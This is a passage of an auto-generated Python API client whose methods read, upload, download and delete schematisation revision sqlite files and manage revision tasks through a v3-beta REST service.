timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_read_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_read_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_read # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_read_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_read`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_sqlite_delete(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_delete # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_delete(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_sqlite_delete_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_sqlite_delete_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_delete # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_delete_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_sqlite_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_sqlite_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_sqlite_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/sqlite/delete/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_sqlite_download(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_download(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Download
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_sqlite_download_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_sqlite_download_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_download_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Download, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_sqlite_download" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_sqlite_download`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_sqlite_download`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/sqlite/download/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Download', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_sqlite_upload(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for uploading the sqlite file. # noqa: E501
The file should preferably be zipped (deflate). Replaces the present sqlite file if there already exists one. Optional md5sum can be added to detect if the file already has been uploaded and perform de-duplication. (md5sum of the compressed sqlite file) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_upload(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SqliteFileUpload data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Upload
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_sqlite_upload_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_sqlite_upload_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for uploading the sqlite file. # noqa: E501
The file should preferably be zipped (deflate). Replaces the present sqlite file if there already exists one. Optional md5sum can be added to detect if the file already has been uploaded and perform de-duplication. (md5sum of the compressed sqlite file) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_upload_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SqliteFileUpload data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Upload, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_sqlite_upload" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_sqlite_upload`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_sqlite_upload`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_sqlite_upload`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/sqlite/upload/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Upload', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_tasks_create(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_create # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_create(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_create_with_http_info(revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_tasks_create_with_http_info(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_create # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_create_with_http_info(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_create`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_create`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_tasks_create`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_tasks_delete(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_delete # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_delete(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_delete_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_tasks_delete_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_delete # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_delete_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_delete`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_tasks_list(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_list # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_list(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_list_with_http_info(revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_tasks_list_with_http_info(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_list # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_list_with_http_info(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2003, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_list`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2003', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_tasks_partial_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_partial_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_partial_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_tasks_partial_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_partial_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_partial_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
